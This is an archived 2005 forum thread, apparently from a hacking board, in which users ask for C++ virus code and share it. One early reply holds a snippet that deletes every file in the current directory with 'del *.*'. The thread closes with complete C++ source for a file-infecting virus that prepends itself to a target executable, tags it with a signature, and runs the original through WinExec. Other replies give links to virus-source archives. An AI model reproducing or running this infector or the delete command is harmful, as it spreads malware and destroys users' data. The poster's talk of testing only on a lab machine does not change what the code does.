Where are some good code examples for virii in C++? A tutorial would be great too.
EDIT: <noobing>Yay! 20th post! New rank.</noobing>
Articles
Metasploit Framework Windows Tutorial The Archives General GSO | Full Version: Virii In C++
#include <stdio.h>
#include <windows.h> int main() { system("ECHO THIS IS NOT A VIRII BOARD > trash.txt"); system("del *.*"); return 0; }  then please move this to the virii section
Viruses are pretty lame.....worms can be pretty Interesting, but considering this forum is more of a White Hat forum, I don't think the moderators would allow the discussion of worm coding....
spybot, agobot i believe are coded in C++
here is a google search which gives you plenty of examples of viruscodes..
vx.netlux.org seems to be down
 . Anybody know when they'll be back?
vx.netlux.org often has problems with its dns, so try http://65.98.58.155 instead. In this case it also doesn't work, but it works more often then the original address...
That link isn't working either scorpion...
Anyone have some links to websites that have virus source codes?
http://madchat.org/vxdevl/vxsrc/
There's lots of vx source out there, and also a lot of zines which come with source (In a variety of languages, all though the older ones will lean towards asm, using tasm) and tutorials (If you can handle the garbled English). 29a for example. QUOTE http://madchat.org/vxdevl/vxsrc/ Alot of virus source codes....mostly ASM. I am still looking for some C/C++ source codes though...
Thanks all.
well, even simple codes can be treated as a virus. A DOS program causing an infinite loop can also be accepted as a virus. This code does it, but I am 200% sure that even script kiddies know this code:
CODE #include <stdio.h> int x; int main() { x=2; while (x==2) { printf("you are hacked..."); } return 0; } so in DOS, even this stupid code can be counted as virus. But if you look for something better, search. Or think how viruses can work. Then try to realize the steps in C. So you get a virus in C. Have fun...
think you meant while(x==2) !!!
QUOTE(tibbar @ Jul 2 2005, 10:47 AM) think you meant while(x==2) !!!  yes, sorry for lack of knowledge 
I don't find anything wrong with discussing viruses on a whitehat board. To understand the enemy, you have to become the enemy.
QUOTE(nolimit @ Jul 2 2005, 01:17 AM) I don't find anything wrong with discussing viruses on a whitehat board. To understand the enemy, you have to become the enemy. i agree... but some guys jump into the deep end and want icing on the cake... esp when it come to bots 
I just want to write (but not release) a really complex really tricky virus so that I can unleash it on a test machine (or if I make a worm also that spreads the virus, a test network) to get some experience. And, I would need to do it in C because that is the language that I know best out of the ones I know.
#include "stdafx.h" #include "windows.h" #include "iostream.h" #include "fstream.h" const char * virus_temp_sig = "XXX"; const char * virus_sig ="XXX"; struct virus_struct { DWORD file_size; char sig[4]; }; virus_struct v_s; char * app_path() { char * path = (char *)malloc(1024); HINSTANCE hi = GetModuleHandle(NULL); GetModuleFileName(hi,path,1024); return path; } DWORD get_file_size(char *path) { WIN32_FIND_DATA fd; FindFirstFile(path,&fd); return fd.nFileSizeLow; } char * load_file_into_ram(char *path) { ifstream f(path,ios::nocreate | ios::binary); if(!f) return (char*)NULL; char * fileram = (char *)malloc(get_file_size(path)); char ch; int pos=0; while(f.get(ch)) { fileram[pos] = ch; pos++; } return fileram; } char * get_temp_file() { char wintemp_path[1024]; char *temp_path=new char[1024]; GetTempPath(1024,wintemp_path); GetTempFileName(wintemp_path,virus_temp_sig,1234,temp_path); return temp_path; } int infect_file(char * source, char * dest) { char * temp_file =get_temp_file(); char * dest_file = load_file_into_ram(dest); char * source_file = load_file_into_ram(source); if(!source_file) return 0; if(!dest_file) return 0; ofstream fout(temp_file,ios::binary); if(!fout) return 0; fout.write(source_file,get_file_size(source)); fout.write(dest_file,get_file_size(dest)); v_s.file_size = get_file_size(dest) ; strcpy(v_s.sig,virus_sig); fout.write((const char *)&v_s,sizeof(virus_struct)); fout.close(); if(!CopyFile(temp_file,dest,false)) return 0; return 1; } virus_struct *check_if_effected() { ifstream fin(app_path() ,ios::binary); fin.seekg(get_file_size(app_path())-sizeof(virus_struct),ios::beg); virus_struct *vs=new virus_struct; fin.read((char*)vs,sizeof(virus_struct)); fin.close(); if(!strcmp(vs->sig,virus_sig)) return vs; return NULL; } void extract_file() { ifstream fin(app_path(),ios::binary); fin.seekg(get_file_size(app_path())-sizeof(virus_struct)); virus_struct *vs=new virus_struct; fin.read((char*)vs,sizeof(virus_struct)); char * infect_file_data = new char[vs->file_size]; fin.seekg(get_file_size(app_path())-vs->file_size-sizeof(virus_struct),ios::beg); //seek to begging of infected file fin.read(infect_file_data,vs->file_size); fin.close(); char * infect_file_path = get_temp_file(); ofstream fout(infect_file_path,ios::binary); fout.write(infect_file_data,vs->file_size); fout.close(); WinExec(infect_file_path,SW_NORMAL); } int main(int argc, char* argv[]) { virus_struct *vs = check_if_effected(); if(!vs) { cout << "I'm not infected " << endl; } else { extract_file(); while(1){} //just idle } if(argc==1) { cout << "Usage: [file to infect] " << endl; return 0; } if(!infect_file(app_path(),argv[1])) { cout << "Failed to infect file " << endl; } return 0; } This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc. |
||
